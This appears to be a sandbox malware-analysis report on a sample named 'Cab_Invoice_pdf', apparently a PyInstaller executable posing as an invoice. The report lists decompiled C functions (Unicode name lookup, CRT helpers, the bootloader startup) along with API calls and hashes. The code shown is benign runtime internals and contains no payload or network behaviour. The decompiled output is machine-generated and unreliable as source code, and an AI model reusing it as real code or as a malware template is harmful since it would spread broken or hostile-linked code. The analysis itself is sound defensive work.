                            				void* _t111;
                            				signed int _t115;
                            				void* _t119;
                            				char _t123;
                            				signed int _t127;
                            				char* _t128;
                            				char* _t129;
                            				unsigned int _t131;
                            				signed int _t132;
                            				void* _t136;
                            				char* _t137;
                            				char* _t138;
                            				char* _t139;
                            				void* _t140;
                            				void* _t141;
                            				void* _t142;
                            				void* _t143;
                            
                            				_t128 = _a8;
                            				_t54 = strncmp(_t128, "HANGUL SYLLABLE ", 0x10);
                            				_t141 = _t140 + 0xc;
                            				if(_t54 != 0) {
                            					_t55 = strncmp(_t128, "CJK UNIFIED IDEOGRAPH-", 0x16);
                            					_t142 = _t141 + 0xc;
                            					if(_t55 != 0) {
                            						_t101 = _a12;
                            						_t131 = 0;
                            						_t119 = 0;
                            						if(_t101 > 0) {
                            							do {
                            								_t131 = _t131 * 0x2f + ( *(( *(_t119 + _t128) & 0x000000ff) + __imp___Py_ctype_toupper) & 0x000000ff);
                            								_t79 = _t131 & 0xff000000;
                            								if(_t79 != 0) {
                            									_t131 = (_t131 ^ _t79 >> 0x00000018) & 0x00ffffff;
                            								}
                            								_t119 = _t119 + 1;
                            							} while (_t119 < _t101);
                            						}
                            						_t58 =  !_t131 & 0x0000ffff;
                            						_v16 = _t58;
                            						_t59 =  *((intOrPtr*)(0x6e3552e0 + _t58 * 4));
                            						_v20 = _t59;
                            						if(_t59 == 0) {
                            							goto L33;
                            						} else {
                            							_t61 = E6E2F3C90(_t101, _a4, _t59, _t128, _t131, _t128, _t101);
                            							_t143 = _t142 + 8;
                            							if(_t61 == 0) {
                            								_t132 = (_t131 >> 0x00000003 ^ _t131) & 0x0000ffff;
                            								if(_t132 == 0) {
                            									_t132 = 0xffff;
                            								}
                            								_t67 = _v16 + _t132 & 0x0000ffff;
                            								_v20 = _t67;
                            								_t102 =  *(0x6e3552e0 + _t67 * 4);
                            								if(_t102 == 0) {
                            									goto L33;
                            								} else {
                            									while(1) {
                            										_t68 = E6E2F3C90(_t102, _a4, _t102, _t128, _t132, _t128, _a12);
                            										_t143 = _t143 + 8;
                            										if(_t68 != 0) {
                            											break;
                            										}
                            										_t132 = _t132 + _t132;
                            										if(_t132 > 0xffff) {
                            											_t132 = _t132 ^ 0x0001002d;
                            										}
                            										_t75 = _v20 + _t132 & 0x0000ffff;
                            										_v20 = _t75;
                            										_t102 =  *(0x6e3552e0 + _t75 * 4);
                            										if(_t102 != 0) {
                            											continue;
                            										} else {
                            											goto L33;
                            										}
                            										goto L39;
                            									}
                            									if(_a20 != 0 || _t102 - 0xf0200 > 0x1b9) {
                            										if(_t102 - 0xf0000 <= 0x1d3) {
                            											_t102 =  *(0x6dfd7928 + _t102 * 4);
                            										}
                            										 *_a16 = _t102;
                            										return 1;
                            									} else {
                            										goto L33;
                            									}
                            								}
                            							} else {
                            								return E6E2F3DC0(_v20, _a16, _a20);
                            							}
                            						}
                            					} else {
                            						_t109 = 0;
                            						_t136 = _a12 - 0x16;
                            						_t129 =  &(_t128[0x16]);
                            						if(_t136 == 4 || _t136 == 5) {
                            							if(_t136 == 0) {
                            								L15:
                            								if(E6E2F3970(_t109) == 0) {
                            									goto L33;
                            								} else {
                            									 *_a16 = _t109;
                            									return 1;
                            								}
                            							} else {
                            								do {
                            									_t123 =  *_t129;
                            									_t136 = _t136 - 1;
                            									_t110 = _t109 << 4;
                            									if(_t123 - 0x30 > 9) {
                            										if(_t123 - 0x41 > 5) {
                            											goto L33;
                            										} else {
                            											_t111 = _t110 + 0xffffffc9;
                            											goto L14;
                            										}
                            									} else {
                            										_t111 = _t110 + 0xffffffd0;
                            										goto L14;
                            									}
                            									goto L39;
                            									L14:
                            									_t129 =  &(_t129[1]);
                            									_t109 = _t111 + _t123;
                            								} while (_t136 != 0);
                            								goto L15;
                            							}
                            						} else {
                            							goto L33;
                            						}
                            					}
                            				} else {
                            					_v12 = 0xffffffff;
                            					_t137 =  &(_t128[0x10]);
                            					_v16 = 0xffffffff;
                            					_v20 = 0xffffffff;
                            					E6E2F3D40(_t137,  &_v8,  &_v12, 0x13, _t54);
                            					_t138 =  &(_t137[_v8]);
                            					E6E2F3D40(_t138,  &_v8,  &_v16, 0x15, 1);
                            					_t139 =  &(_t138[_v8]);
                            					E6E2F3D40(_t139,  &_v8,  &_v20, 0x1c, 2);
                            					_t115 = _v12;
                            					if(_t115 == 0xffffffff) {
                            						L33:
                            						return 0;
                            					} else {
                            						_t127 = _v16;
                            						if(_t127 == 0xffffffff) {
                            							goto L33;
                            						} else {
                            							_t103 = _v20;
                            							if(_t103 == 0xffffffff || _v8 - _t128 + _t139 != _a12) {
                            								goto L33;
                            							} else {
                            								 *_a16 = _t103 + ((_t115 * 0x15 + _t127) * 8 - _t115 * 0x15 + _t127 + 0x2b00) * 4;
                            								return 1;
                            							}
                            						}
                            					}
                            				}
                            				L39:
                            			}

                            APIs
                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,HANGUL SYLLABLE ,00000010,?,?,?,?,?,00000001), ref: 6E2F3E1A
                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CJK UNIFIED IDEOGRAPH-,00000016,?,?,?,?,?,00000001), ref: 6E2F3EE0
                              • Part of subcall function 6E2F3D40: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000013,?,?,?,?,?,00000013,00000000), ref: 6E2F3D82
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: strncmp
                            • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                            • API String ID: 1114863663-87138338
                            • Opcode ID: df044ab06aeb556ab101745bd65bfc54eb6a0d6771bfe9c55cc1d870bd308f97
                            • Instruction ID: f163d63416b3d4ca9700d0d20e2046f39c58553db3fdf30f7448520f68e52671
                            • Opcode Fuzzy Hash: df044ab06aeb556ab101745bd65bfc54eb6a0d6771bfe9c55cc1d870bd308f97
                            • Instruction Fuzzy Hash: 5F71F432A4012E8BDB04CE98DD947FEF3B6BB04329F00026AE965D7381E7719D138791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E0132CE51(signed int __edx, intOrPtr _a4, intOrPtr _a8, int _a12) {
                            				int _v8;
                            				intOrPtr _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _t16;
                            				signed int _t17;
                            				int _t20;
                            				signed int _t21;
                            				int _t23;
                            				signed int _t25;
                            				int _t28;
                            				intOrPtr* _t30;
                            				int _t34;
                            				int _t35;
                            				void* _t36;
                            				intOrPtr* _t37;
                            				intOrPtr* _t38;
                            				int _t46;
                            				void* _t54;
                            				void* _t56;
                            				signed int _t58;
                            				int _t61;
                            				int _t63;
                            				void* _t64;
                            				void* _t65;
                            				void* _t66;
                            
                            				_t58 = __edx;
                            				_t59 = _a4;
                            				_t61 = 0;
                            				_t16 = E01322807(_a4, 0, 0, 1);
                            				_v20 = _t16;
                            				_v16 = __edx;
                            				_t65 = _t64 + 0x10;
                            				if((_t16 & __edx) != 0xffffffff) {
                            					_t17 = E01322807(_t59, 0, 0, 2);
                            					_t66 = _t65 + 0x10;
                            					_t51 = _t17 & __edx;
                            					__eflags = (_t17 & __edx) - 0xffffffff;
                            					if((_t17 & __edx) == 0xffffffff) {
                            						goto L1;
                            					}
                            					_t46 = _a8 - _t17;
                            					__eflags = _t46;
                            					_t20 = _a12;
                            					asm("sbb eax, edx");
                            					_v8 = _t20;
                            					if(__eflags < 0) {
                            						L24:
                            						__eflags = _t20 - _t61;
                            						if(__eflags > 0) {
                            							L19:
                            							_t21 = E01322807(_t59, _v20, _v16, _t61);
                            							__eflags = (_t21 & _t58) - 0xffffffff;
                            							if((_t21 & _t58) != 0xffffffff) {
                            								_t23 = 0;
                            								__eflags = 0;
                            								L31:
                            								return _t23;
                            							}
                            							L20:
                            							_t23 =  *((intOrPtr*)(E0131C9CE()));
                            							goto L31;
                            						}
                            						if(__eflags < 0) {
                            							L27:
                            							_t25 = E01322807(_t59, _a8, _a12, _t61);
                            							_t66 = _t66 + 0x10;
                            							__eflags = (_t25 & _t58) - 0xffffffff;
                            							if((_t25 & _t58) == 0xffffffff) {
                            								goto L20;
                            							}
                            							_t28 = SetEndOfFile(E0131E926(_t59));
                            							__eflags = _t28;
                            							if(_t28 != 0) {
                            								goto L19;
                            							}
                            							 *((intOrPtr*)(E0131C9CE())) = 0xd;
                            							_t30 = E0131C9BB();
                            							 *_t30 = GetLastError();
                            							goto L20;
                            						}
                            						__eflags = _t46 - _t61;
                            						if(_t46 >= _t61) {
                            							goto L19;
                            						}
                            						goto L27;
                            					}
                            					if(__eflags > 0) {
                            						L6:
                            						_t63 = E01320B10(_t51, 0x1000, 1);
                            						_pop(_t54);
                            						__eflags = _t63;
                            						if(_t63 != 0) {
                            							_v12 = E0131D960(_t54, _t59, 0x8000);
                            							_t34 = _v8;
                            							_pop(_t56);
                            							do {
                            								__eflags = _t34;
                            								if(__eflags < 0) {
                            									L13:
                            									_t35 = _t46;
                            									L14:
                            									_t36 = E0132308B(_t59, _t63, _t35);
                            									_t66 = _t66 + 0xc;
                            									__eflags = _t36 - 0xffffffff;
                            									if(_t36 == 0xffffffff) {
                            										_t37 = E0131C9BB();
                            										__eflags =  *_t37 - 5;
                            										if( *_t37 == 5) {
                            											 *((intOrPtr*)(E0131C9CE())) = 0xd;
                            										}
                            										L23:
                            										_t38 = E0131C9CE();
                            										E013209EB(_t63);
                            										_t23 =  *_t38;
                            										goto L31;
                            									}
                            									asm("cdq");
                            									_t46 = _t46 - _t36;
                            									_t34 = _v8;
                            									asm("sbb eax, edx");
                            									_v8 = _t34;
                            									__eflags = _t34;
                            									if(__eflags > 0) {
                            										L12:
                            										_t35 = 0x1000;
                            										goto L14;
                            									}
                            									if(__eflags < 0) {
                            										break;
                            									}
                            									goto L17;
                            								}
                            								if(__eflags > 0) {
                            									goto L12;
                            								}
                            								__eflags = _t46 - 0x1000;
                            								if(_t46 < 0x1000) {
                            									goto L13;
                            								}
                            								goto L12;
                            								L17:
                            								__eflags = _t46;
                            							} while (_t46 != 0);
                            							E0131D960(_t56, _t59, _v12);
                            							E013209EB(_t63);
                            							_t66 = _t66 + 0xc;
                            							_t61 = 0;
                            							__eflags = 0;
                            							goto L19;
                            						}
                            						 *((intOrPtr*)(E0131C9CE())) = 0xc;
                            						goto L23;
                            					}
                            					__eflags = _t46;
                            					if(_t46 <= 0) {
                            						goto L24;
                            					}
                            					goto L6;
                            				}
                            				L1:
                            				return  *((intOrPtr*)(E0131C9CE()));
                            			}






























                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: 7a815f09b851f3af87ac9eea72cbe2fa14c60fd18fa9d42c3029e95416590607
                            • Instruction ID: 6a8371eefd091abc7d88622678c3f8378c6bd9c98afdf8dbe5d8316ba38fca1b
                            • Opcode Fuzzy Hash: 7a815f09b851f3af87ac9eea72cbe2fa14c60fd18fa9d42c3029e95416590607
                            • Instruction Fuzzy Hash: 1F414832A402367BDB357BBC8C80EBE3EA9EF1267CF141215F51DD6194D674894983A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 83%
                            			E01328041(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                            				signed int _v8;
                            				int _v12;
                            				char _v16;
                            				intOrPtr _v24;
                            				char _v28;
                            				void* _v40;
                            				void* __ebx;
                            				void* __edi;
                            				signed int _t34;
                            				signed int _t40;
                            				int _t45;
                            				int _t52;
                            				void* _t53;
                            				void* _t55;
                            				int _t57;
                            				signed int _t63;
                            				int _t67;
                            				short* _t71;
                            				signed int _t72;
                            				short* _t73;
                            
                            				_t34 =  *0x133c008; // 0xa212446c
                            				_v8 = _t34 ^ _t72;
                            				_push(_t53);
                            				E0131AFAE(_t53,  &_v28, __edx, _a4);
                            				_t57 = _a24;
                            				if(_t57 == 0) {
                            					_t52 =  *(_v24 + 8);
                            					_t57 = _t52;
                            					_a24 = _t52;
                            				}
                            				_t67 = 0;
                            				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                            				_v12 = _t40;
                            				if(_t40 == 0) {
                            					L15:
                            					if(_v16 != 0) {
                            						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                            					}
                            					E0131786A();
                            					return _t67;
                            				}
                            				_t55 = _t40 + _t40;
                            				asm("sbb eax, eax");
                            				if((_t55 + 0x00000008 & _t40) == 0) {
                            					_t71 = 0;
                            					L11:
                            					if(_t71 != 0) {
                            						E01318520(_t67, _t71, _t67, _t55);
                            						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
                            						if(_t45 != 0) {
                            							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
                            						}
                            					}
                            					L14:
                            					E0132815E(_t71);
                            					goto L15;
                            				}
                            				asm("sbb eax, eax");
                            				_t47 = _t40 & _t55 + 0x00000008;
                            				_t63 = _t55 + 8;
                            				if((_t40 & _t55 + 0x00000008) > 0x400) {
                            					asm("sbb eax, eax");
                            					_t71 = E01320A25(_t63, _t47 & _t63);
                            					if(_t71 == 0) {
                            						goto L14;
                            					}
                            					 *_t71 = 0xdddd;
                            					L9:
                            					_t71 =  &(_t71[4]);
                            					goto L11;
                            				}
                            				asm("sbb eax, eax");
                            				E0132F250();
                            				_t71 = _t73;
                            				if(_t71 == 0) {
                            					goto L14;
                            				}
                            				 *_t71 = 0xcccc;
                            				goto L9;
                            			}


                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,01323E2E,?,00000000,?,00000001,?,?,00000001,01323E2E,?), ref: 0132808E
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 01328117
                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,01320C3C,?), ref: 01328129
                            • __freea.LIBCMT ref: 01328132
                              • Part of subcall function 01320A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                            • String ID:
                            • API String ID: 2652629310-0
                            • Opcode ID: f5e7fb08b5d7ddbabfcc46837f92d3fb1fdd42e651adc2c65bdd86b8c6efa288
                            • Instruction ID: c38cdc15ecfb4a93aad769d38e4fda7e8979d4cc34cff848d020fe9e9ec58fd9
                            • Opcode Fuzzy Hash: f5e7fb08b5d7ddbabfcc46837f92d3fb1fdd42e651adc2c65bdd86b8c6efa288
                            • Instruction Fuzzy Hash: 9B31D472A0022AABDF25AF68DC40DAF7BE5EF50714F1441A8FC04D7194EB35D951CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 95%
                            			E01323623(signed int _a4) {
                            				signed int _t9;
                            				void* _t13;
                            				signed int _t15;
                            				WCHAR* _t22;
                            				signed int _t24;
                            				signed int* _t25;
                            				void* _t27;
                            
                            				_t9 = _a4;
                            				_t25 = 0x1346318 + _t9 * 4;
                            				_t24 =  *_t25;
                            				if(_t24 == 0) {
                            					_t22 =  *(0x13352d0 + _t9 * 4);
                            					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                            					if(_t27 != 0) {
                            						L8:
                            						 *_t25 = _t27;
                            						if( *_t25 != 0) {
                            							FreeLibrary(_t27);
                            						}
                            						_t13 = _t27;
                            						L11:
                            						return _t13;
                            					}
                            					_t15 = GetLastError();
                            					if(_t15 != 0x57) {
                            						_t27 = 0;
                            					} else {
                            						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                            						_t27 = _t15;
                            					}
                            					if(_t27 != 0) {
                            						goto L8;
                            					} else {
                            						 *_t25 = _t15 | 0xffffffff;
                            						_t13 = 0;
                            						goto L11;
                            					}
                            				}
                            				_t4 = _t24 + 1; // 0xa212446d
                            				asm("sbb eax, eax");
                            				return  ~_t4 & _t24;
                            			}


                            APIs
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0131A8EB,00000000,00000000,?,013235CA,0131A8EB,00000000,00000000,00000000,?,01323889,00000006,FlsSetValue), ref: 01323655
                            • GetLastError.KERNEL32(?,013235CA,0131A8EB,00000000,00000000,00000000,?,01323889,00000006,FlsSetValue,013357B4,013357BC,00000000,00000364,?,013244F7), ref: 01323661
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,013235CA,0131A8EB,00000000,00000000,00000000,?,01323889,00000006,FlsSetValue,013357B4,013357BC,00000000), ref: 0132366F
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: LibraryLoad$ErrorLast
                            • String ID:
                            • API String ID: 3177248105-0
                            • Opcode ID: bad26df613f07dd005085c16599c29d2a0f759aa768d02eeb89bdd357df91d79
                            • Instruction ID: ef0cb0fa4b0668c1ccd00ca3549c129f1052f6e498986ee5c99aec6eca9fa040
                            • Opcode Fuzzy Hash: bad26df613f07dd005085c16599c29d2a0f759aa768d02eeb89bdd357df91d79
                            • Instruction Fuzzy Hash: 3D01D432601236ABC731596CACC4A5ABB9CFB09B75F110620F919D3240D738D8048BE8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E013190D6() {
                            				void* _t4;
                            				void* _t8;
                            
                            				E013195F4();
                            				E01319588();
                            				if(E013192E8() != 0) {
                            					_t4 = E0131929A(_t8, __eflags);
                            					__eflags = _t4;
                            					if(_t4 != 0) {
                            						return 1;
                            					} else {
                            						E01319324();
                            						goto L1;
                            					}
                            				} else {
                            					L1:
                            					return 0;
                            				}
                            			}


                            APIs
                            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 013190D6
                            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 013190DB
                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 013190E0
                              • Part of subcall function 013192E8: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 013192F9
                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 013190F5
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                            • String ID:
                            • API String ID: 1761009282-0
                            • Opcode ID: e28c8e4002e4feb3b2185dbbe633f88e05227d084f504df5a77bd89c2bb576a4
                            • Instruction ID: f1ae8affaf00e4f12c2a455dbc1020fa86d0da459a9f17d5c8056f63a281f38a
                            • Opcode Fuzzy Hash: e28c8e4002e4feb3b2185dbbe633f88e05227d084f504df5a77bd89c2bb576a4
                            • Instruction Fuzzy Hash: 8CC0486440032BD8DD2D3ABD22B53ED23880EBB98DBC0A8C1C8A02B44E8D07006B5333
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 40%
                            			E01312450(void* __edx, void* __eflags, char _a4092, char _a4096, char _a8192, signed int _a12284, signed int _a12288, intOrPtr _a12292, intOrPtr _a12296, intOrPtr _a12300) {
                            				char _v0;
                            				char _v4;
                            				void* __ebx;
                            				void* __edi;
                            				void* __ebp;
                            				signed int _t35;
                            				signed int _t39;
                            				signed int _t49;
                            				signed int _t52;
                            				signed int _t53;
                            				signed int _t60;
                            				signed int _t63;
                            				signed int _t64;
                            				signed int _t68;
                            				signed int _t69;
                            				signed int _t71;
                            				signed int _t74;
                            				void* _t76;
                            				signed int _t77;
                            				void* _t79;
                            				signed int _t85;
                            				signed int _t87;
                            				signed int _t91;
                            				signed int _t93;
                            				intOrPtr _t98;
                            				signed int _t101;
                            				intOrPtr* _t102;
                            				intOrPtr _t104;
                            				signed int _t108;
                            				void* _t110;
                            				void* _t112;
                            				void* _t114;
                            				signed int _t115;
                            				void* _t117;
                            				void* _t120;
                            
                            				_t120 = __eflags;
                            				_t90 = __edx;
                            				E01317880();
                            				_t35 =  *0x133c008; // 0xa212446c
                            				_a12288 = _t35 ^ _t108;
                            				_t104 = _a12300;
                            				E0131D2BE(E0131A7EB(2), 0);
                            				_push(0);
                            				_t39 = E01311770(_t120);
                            				_t93 = _t39;
                            				_t110 = _t108 + 0x10;
                            				if(_t93 != 0) {
                            					_t39 = E013127A0(__edx,  &_v0, _v0);
                            					_t110 = _t110 + 8;
                            					__eflags = _t39;
                            					if(_t39 == 0) {
                            						goto L1;
                            					} else {
                            						_t39 = E013126F0( &_a8192,  &_v0);
                            						_t110 = _t110 + 8;
                            						__eflags = _t39;
                            						if(__eflags == 0) {
                            							goto L1;
                            						} else {
                            							_t39 = L01312930(__eflags,  &_a4096,  &_v0);
                            							_t110 = _t110 + 8;
                            							__eflags = _t39;
                            							if(_t39 == 0) {
                            								goto L1;
                            							} else {
                            								_push(_t76);
                            								_push("_MEIPASS2");
                            								_t77 = E01313E40(_t76, _t93);
                            								E013143D0("_MEIPASS2");
                            								_t49 = E01311690(_t104, _t93,  &_v0);
                            								_t112 = _t110 + 0x10;
                            								__eflags = _t49;
                            								if(_t49 != 0) {
                            									L8:
                            									 *((intOrPtr*)(_t93 + 0x4074)) = _t104;
                            									_t98 = _a12296;
                            									 *((intOrPtr*)(_t93 + 0x4070)) = _t98;
                            									__eflags = _t77;
                            									if(_t77 != 0) {
                            										L11:
                            										__imp__SetDllDirectoryW(E01314BF0(0, _t77, 0));
                            										L01319803(_t50);
                            										_t114 = _t112 + 0x10;
                            										__eflags = _t77;
                            										if(_t77 == 0) {
                            											_t98 = _a12292;
                            											goto L25;
                            										} else {
                            											_t85 = _t77;
                            											_t63 =  &_a4092;
                            											while(1) {
                            												_t91 =  *_t63;
                            												__eflags = _t91 -  *_t85;
                            												if(_t91 !=  *_t85) {
                            													break;
                            												}
                            												__eflags = _t91;
                            												if(_t91 == 0) {
                            													L17:
                            													_t64 = 0;
                            												} else {
                            													_t91 =  *((intOrPtr*)(_t63 + 1));
                            													__eflags = _t91 -  *((intOrPtr*)(_t85 + 1));
                            													if(_t91 !=  *((intOrPtr*)(_t85 + 1))) {
                            														break;
                            													} else {
                            														_t63 = _t63 + 2;
                            														_t85 = _t85 + 2;
                            														__eflags = _t91;
                            														if(_t91 != 0) {
                            															continue;
                            														} else {
                            															goto L17;
                            														}
                            													}
                            												}
                            												L19:
                            												__eflags = _t64;
                            												if(__eflags == 0) {
                            													L23:
                            													_push(_t93);
                            													E01312140(_t91, __eflags);
                            													_t101 = E01312010(_t77, __eflags, _t93);
                            													L01312130(_t93);
                            													_t115 = _t114 + 0xc;
                            													goto L31;
                            												} else {
                            													_t21 = _t93 + 0x2068; // 0x2068
                            													_t102 = _t21;
                            													_t52 = E01311AC0(_t102, 0x1000, "%s", _t77);
                            													_t115 = _t114 + 0x10;
                            													__eflags = _t52 - 0x1000;
                            													if(_t52 >= 0x1000) {
                            														goto L27;
                            													} else {
                            														_t22 = _t93 + 0x3068; // 0x3068
                            														 *((intOrPtr*)(_t93 + 0x4068)) = 1;
                            														_t87 = _t22 - _t102;
                            														__eflags = _t87;
                            														do {
                            															_t68 =  *_t102;
                            															_t102 = _t102 + 1;
                            															 *((char*)(_t87 + _t102 - 1)) = _t68;
                            															__eflags = _t68;
                            														} while (__eflags != 0);
                            														goto L23;
                            													}
                            												}
                            												goto L32;
                            											}
                            											asm("sbb eax, eax");
                            											_t64 = _t63 | 0x00000001;
                            											__eflags = _t64;
                            											goto L19;
                            										}
                            									} else {
                            										_t69 = E013121D0(_t93);
                            										_t114 = _t112 + 4;
                            										__eflags = _t69;
                            										if(_t69 != 0) {
                            											L25:
                            											_t52 = E01312070(_t90, _t104, _t93);
                            											_t115 = _t114 + 4;
                            											__eflags = _t52;
                            											if(_t52 != 0) {
                            												L27:
                            												_t53 = _t52 | 0xffffffff;
                            											} else {
                            												__eflags =  *((char*)(_t93 + 0x2068));
                            												_t29 = _t93 + 0x2068; // 0x2068
                            												_t79 = _t29;
                            												_t55 =  !=  ? _t79 :  &_a4092;
                            												E01314390("_MEIPASS2",  !=  ? _t79 :  &_a4092);
                            												_push("_MEIPASS2");
                            												E01313E40(_t79, _t93);
                            												_push(_t93);
                            												_t52 = E013180A0();
                            												_t115 = _t115 + 0x10;
                            												__eflags = _t52 - 0xffffffff;
                            												if(__eflags != 0) {
                            													E013123D0(_t52);
                            													_push(_t104);
                            													_push(_t98);
                            													_push(_t93);
                            													_push( &_v4);
                            													_t60 = E01314400(_t90, _t104, __eflags);
                            													_t117 = _t115 + 0x10;
                            													_t101 = _t60;
                            													__eflags =  *((intOrPtr*)(_t93 + 0x4068)) - 1;
                            													if( *((intOrPtr*)(_t93 + 0x4068)) == 1) {
                            														_push(_t79);
                            														E013140E0(_t90);
                            														_t117 = _t117 + 4;
                            													}
                            													E01311730(_t90, _t104, _t93);
                            													_t115 = _t117 + 4;
                            													L31:
                            													_t53 = _t101;
                            												} else {
                            													goto L27;
                            												}
                            											}
                            										} else {
                            											_t77 =  &_a4096;
                            											goto L11;
                            										}
                            									}
                            									L32:
                            									__eflags = _a12284 ^ _t115;
                            									E0131786A();
                            									return _t53;
                            								} else {
                            									_t71 = E01311690(_t104, _t93,  &_a8192);
                            									_t112 = _t112 + 8;
                            									__eflags = _t71;
                            									if(__eflags != 0) {
                            										goto L8;
                            									} else {
                            										_push( &_a8192);
                            										_t74 = E01311910(__eflags, "Cannot open self %s or archive %s\n",  &_v0);
                            										__eflags = _a12288 ^ _t112 + 0x0000000c;
                            										E0131786A();
                            										return _t74 | 0xffffffff;
                            									}
                            								}
                            							}
                            						}
                            					}
                            				} else {
                            					L1:
                            					E0131786A();
                            					return _t39 | 0xffffffff;
                            				}
                            			}

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
